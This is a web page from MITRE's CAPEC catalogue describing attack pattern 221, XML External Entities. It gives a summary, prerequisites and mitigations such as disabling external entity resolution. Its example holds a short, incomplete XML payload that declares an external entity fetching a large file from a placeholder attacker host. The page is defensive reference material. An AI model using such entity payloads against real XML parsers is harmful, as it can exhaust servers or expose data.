Home > CAPEC List > CAPEC-221: XML External Entities (Version 2.11)  

CAPEC-221: XML External Entities

XML External Entities
Definition in a New Window Definition in a New Window
Attack Pattern ID: 221
Abstraction: Standard
Status: Draft
Completeness: Stub
Presentation Filter:
+ Summary

This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.

+ Attack Prerequisites
  • A server that has an implementation that accepts entities containing URI values.

+ Examples-Instances


In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.

<?xml version="1.0"?>
< !DOCTYPE bomb [
<!ENTITY detonate SYSTEM "http://www.malicious-badguy.com/myhugefile.exe">
+ Solutions and Mitigations

This attack may be mitigated by tweaking the XML parser to not resolve external entities. If external entities are needed, then implement a custom XmlResolver that has a request timeout, data retrieval limit, and restrict resources it can retrieve locally.

+ Content History
CAPEC Content TeamThe MITRE Corporation2014-06-23Internal_CAPEC_Team
CAPEC Content TeamThe MITRE Corporation2017-08-04Updated Related_Attack_PatternsInternal

More information is available — Please select a different filter.
Page Last Updated or Reviewed: August 04, 2017